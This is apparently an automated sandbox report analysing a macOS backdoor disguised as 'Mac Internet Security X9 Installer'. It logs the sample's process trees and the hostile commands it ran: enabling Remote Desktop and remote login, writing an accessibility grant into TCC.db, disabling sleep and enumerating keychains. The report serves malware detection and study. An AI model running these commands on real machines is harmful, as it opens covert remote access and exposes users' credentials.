Source: /bin/sh (PID: 563)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 564)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 565)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 566)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 568)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 569)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 570)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 575)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 578)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 579)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 581)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 583)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 585)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 586)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 591)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 592)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 593)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 596)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 597)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 600)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 601)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 602)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 604)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 606)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 607)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 609)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 611)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 613)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 615)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 617)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 619)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 621)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 625)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 626)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 627)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 628)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 629)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 630)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 632)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 633)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 634)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 635)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 636)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 638)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 639)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 640)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 641)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 642)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 644)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 645)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 646)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 648)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 665)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 671)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 673)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 675)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 677)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 679)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/sw_vers (PID: 547)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /usr/bin/perl5.18 (PID: 668)Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsers -boolean YESJump to behavior
Source: /usr/bin/perl5.18 (PID: 669)Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsersPrivs -integer 1073742079Jump to behavior
Executes the "systemsetup" command used to configure System PreferencesShow sources
Source: /usr/bin/sudo (PID: 543)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setremotelogin onJump to behavior
Source: /usr/bin/sudo (PID: 672)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setcomputersleep NeverJump to behavior
Queries and/or modifies the SQLite TCC DB responsible for privacy and accessibility relevant settingsShow sources
Source: /usr/bin/sudo (PID: 541)TCC.db query/modification: /usr/bin/sqlite3 -> /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)Jump to behavior

Stealing of Sensitive Information:

barindex
Executes the "ifconfig" command used to gather network informationShow sources
Source: /bin/bash (PID: 538)Ifconfig executable: /sbin/ifconfig -> ifconfigJump to behavior
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 537)Keychain directory enumerated: /Users/henry/Library/KeychainsJump to behavior
Source: /usr/bin/zip (PID: 537)Keychain directory enumerated: /Library/KeychainsJump to behavior
Writes files with ifconfig informationShow sources
Source: /sbin/ifconfig (PID: 538)File created with possible ifconfig output: /Users/henry/.calisto/network.datJump to dropped file


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 57793 Sample: FmTmHujm4o Startdate: 26/07/2018 Architecture: MAC Score: 100 68 mesu.g.aaplimg.com 17.253.57.208, 443, 49263 APPLE-AUSTIN-AppleIncUS United States 2->68 10 xpcproxy Mac Internet Security X9 Installer 2->10         started        process3 process4 12 bash 1 10->12         started        14 bash mkdir 10->14         started        process5 16 bash sudo 12->16         started        19 bash sudo 12->19         started        21 bash sudo 12->21         started        23 10 other processes 12->23 file6 70 Executes the "sudo" command used to execute a command as another user 16->70 26 sudo kickstart perl5.18 16->26         started        29 sudo cp 24 19->29         started        32 sudo zip 1 21->32         started        56 /Users/henry/.calisto/network.dat, ASCII 23->56 dropped 72 Writes files with ifconfig information 23->72 74 Executes the "dsenableroot" command used to enable/disable the root account 23->74 76 Executes the "ifconfig" command used to gather network information 23->76 34 sudo sqlite3 23->34         started        36 sudo systemsetup 23->36         started        38 sudo systemsetup 23->38         started        40 3 other processes 23->40 signatures7 process8 file9 80 Enables system access through Apple's Remote Desktop Sharing for all users 26->80 82 Uses kickstart to modify Apple's Remote Desktop settings 26->82 42 perl5.18 sh 26->42         started        44 perl5.18 sh 26->44         started        46 perl5.18 sh dscl 26->46         started        49 117 other processes 26->49 58 /System/Library/Co...-X9-Installer.plist, XML 29->58 dropped 60 /System/Library/Co...sources/InfoL.plist, XML 29->60 dropped 62 /System/Library/Co...curity X9 Installer, Mach-O 29->62 dropped 84 May steal keychain information which contains credentials 32->84 86 Modifies SQLite TCC DB accessibility settings (may be set to prevent user dialogs) 34->86 88 Queries and/or modifies the SQLite TCC DB responsible for privacy and accessibility relevant settings 34->88 90 Explicitly enables remote login within the System Preferences 36->90 92 Executes the "systemsetup" command used to configure System Preferences 36->92 94 Explicitly disables computer sleep within the System Preferences (may be set for surreptitious remote desktop access) 38->94 64 /System/Library/Co...Contents/Info.plist, XML 40->64 dropped 66 /Library/LaunchAge...-X9-Installer.plist, XML 40->66 dropped signatures10 process11 signatures12 51 sh launchctl 42->51         started        54 sh dscl 44->54         started        96 Many shell processes execute programs via execve syscall (may be indicative for malicious behavior) 46->96 98 Reads process information of other processes 49->98 100 Executes the "defaults" command used to read or modify user specific settings 49->100 process13 signatures14 78 Many shell processes execute programs via execve syscall (may be indicative for malicious behavior) 51->78

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 529 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • Mac Internet Security X9 Installer (PID: 529 PPID: 1 Overlayed Process Image: xpcproxy MD5: 2f38b201f6b368d587323a1bec516e5d)
    • bash (PID: 533 PPID: 529 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • mkdir (PID: 533 PPID: 529 Overlayed Process Image: bash MD5: 135a3b94b3d9efccb4c8cd23ac404571)
    • bash (PID: 534 PPID: 529 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 535 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 536 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 536 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 537 PPID: 536 MD5: 60ac5909d06d86e22aace3a863b13690)
        • zip (PID: 537 PPID: 536 Overlayed Process Image: sudo MD5: 0671448c6db64bbe114d56d40154ac85)
      • bash (PID: 538 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • ifconfig (PID: 538 PPID: 534 Overlayed Process Image: bash MD5: f81633f11f5fc0db70078b5ed1fedcec)
      • bash (PID: 539 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • zip (PID: 539 PPID: 534 Overlayed Process Image: bash MD5: 0671448c6db64bbe114d56d40154ac85)
      • bash (PID: 540 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 540 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 541 PPID: 540 MD5: 60ac5909d06d86e22aace3a863b13690)
        • sqlite3 (PID: 541 PPID: 540 Overlayed Process Image: sudo MD5: 3896c1435547ca0c58cf8c7b94408933)
      • bash (PID: 542 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 542 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 543 PPID: 542 MD5: 60ac5909d06d86e22aace3a863b13690)
        • systemsetup (PID: 543 PPID: 542 Overlayed Process Image: sudo MD5: 63847628d396b5b245013f1417946a56)
      • bash (PID: 545 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 545 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 546 PPID: 545 MD5: 60ac5909d06d86e22aace3a863b13690)
        • kickstart (PID: 546 PPID: 545 Overlayed Process Image: sudo MD5: 0774d8bfac77a96f80a4a1049e0e1730)
        • perl5.18 (PID: 546 PPID: 545 Overlayed Process Image: kickstart MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • perl5.18 (PID: 547 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sw_vers (PID: 547 PPID: 546 Overlayed Process Image: perl5.18 MD5: d33f7f9efd4158694d0d58879b54f89d)
          • perl5.18 (PID: 548 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 548 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 548 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 549 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 549 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 549 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 550 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 550 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 550 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 551 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 551 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 551 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 552 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 552 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 552 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 553 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 553 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 553 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 554 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 554 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 554 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 555 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 555 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 555 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 556 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 556 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 556 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 557 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 557 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 557 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 558 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 558 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 558 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 559 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 559 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 559 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 560 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 560 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 560 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 561 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 561 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 561 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 562 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 562 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 562 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 563 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 563 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 563 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 564 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 564 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 564 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 565 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 565 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 565 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 566 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 566 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 566 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 567 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 567 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 567 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 568 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 568 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 568 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 569 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 569 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 569 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 570 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 570 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 570 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 571 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 571 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 571 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 572 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 572 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 572 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 573 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 573 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 573 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 574 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 574 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 574 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 575 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 575 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 575 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 576 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 576 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 576 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 577 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 577 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 577 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 578 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 578 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 578 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 579 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 579 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 579 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 580 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 580 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 580 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 581 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 581 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 581 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 582 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 582 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 582 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 583 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 583 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 583 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 584 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 584 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 584 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 585 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 585 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 585 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 586 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 586 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 586 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 587 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 587 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 587 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 588 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 588 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
